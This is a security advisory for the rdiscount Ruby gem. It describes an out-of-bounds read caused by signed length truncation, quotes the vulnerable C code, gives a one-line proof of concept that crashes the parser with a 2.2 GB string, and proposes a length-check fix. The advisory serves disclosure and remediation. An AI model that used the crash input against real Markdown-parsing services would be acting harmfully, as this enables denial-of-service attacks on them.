Launch Week Day 1: Announcing Security Design Review
MEDIUM 5.9 RubyGems

rdiscount has an Out-of-bounds Read

GHSA-6r34-94wq-jhrc · CVE-2026-35201

Published · Modified

Description

Summary

A signed length truncation bug causes an out-of-bounds read in the default Markdown parse path. Inputs larger than INT_MAX are truncated to a signed int before entering the native parser, allowing the parser to read past the end of the supplied buffer and crash the process

Details

In both public entry points:

  • ext/rdiscount.c:97
  • ext/rdiscount.c:136

RSTRING_LEN(text) is passed directly into mkd_string():

MMIOT *doc = mkd_string(RSTRING_PTR(text), RSTRING_LEN(text), flags);

mkd_string() accepts int len:

  • ext/mkdio.c:174
Document * mkd_string(const char *buf, int len, mkd_flag_t flags)
{
    struct string_stream about;

    about.data = buf;
    about.size = len;

    return populate((getc_func)__mkd_io_strget, &about, flags & INPUT_MASK);
}

The parser stores the remaining input length in a signed int:

  • ext/markdown.h:205
struct string_stream {
    const char *data;
    int   size;
};

The read loop stops only when size == 0:

  • ext/mkdio.c:161
int __mkd_io_strget(struct string_stream *in)
{
    if ( !in->size ) return EOF;

    --(in->size);

    return *(in->data)++;
}

If the Ruby string length exceeds INT_MAX, the value can truncate to a negative int. In that state, the parser continues incrementing data and reading past the end of the original Ruby string, causing an out-of-bounds read and native crash.

Affected APIs:

  • RDiscount.new(input).to_html
  • RDiscount.new(input).toc_content

PoC

Crash via to_html:

RUBYLIB=lib:ext ruby -e 'require "rdiscount"; n=2_200_000_000; s = "a" * n; warn "built=#{s.bytesize}"; RDiscount.new(s).to_html"'

result:

  • built=2200000000
  • Ruby terminates with [BUG] Segmentation fault
  • top control frame: CFUNC :to_html

same result with toc_content

Impact

This is an out-of-bounds read with the main issue being reliable denial-of-service. Impacted is limited to deployments parses attacker-controlled Markdown and permits multi-GB inputs.

Fix

just add a checked length guard before the mkd_string() call in both public entry points:

  • ext/rdiscount.c:97
  • ext/rdiscount.c:136
    ex:
VALUE text = rb_funcall(self, rb_intern("text"), 0);
long text_len = RSTRING_LEN(text);
VALUE buf = rb_str_buf_new(1024);
Check_Type(text, T_STRING);

if (text_len > INT_MAX) {
    rb_raise(rb_eArgError, "markdown input too large");
}

MMIOT *doc = mkd_string(RSTRING_PTR(text), (int)text_len, flags);

The same guard should be applied in rb_rdiscount_toc_content() before its mkd_string() call.

Ready to move

Start Securing

Free, no credit card | First findings in minutes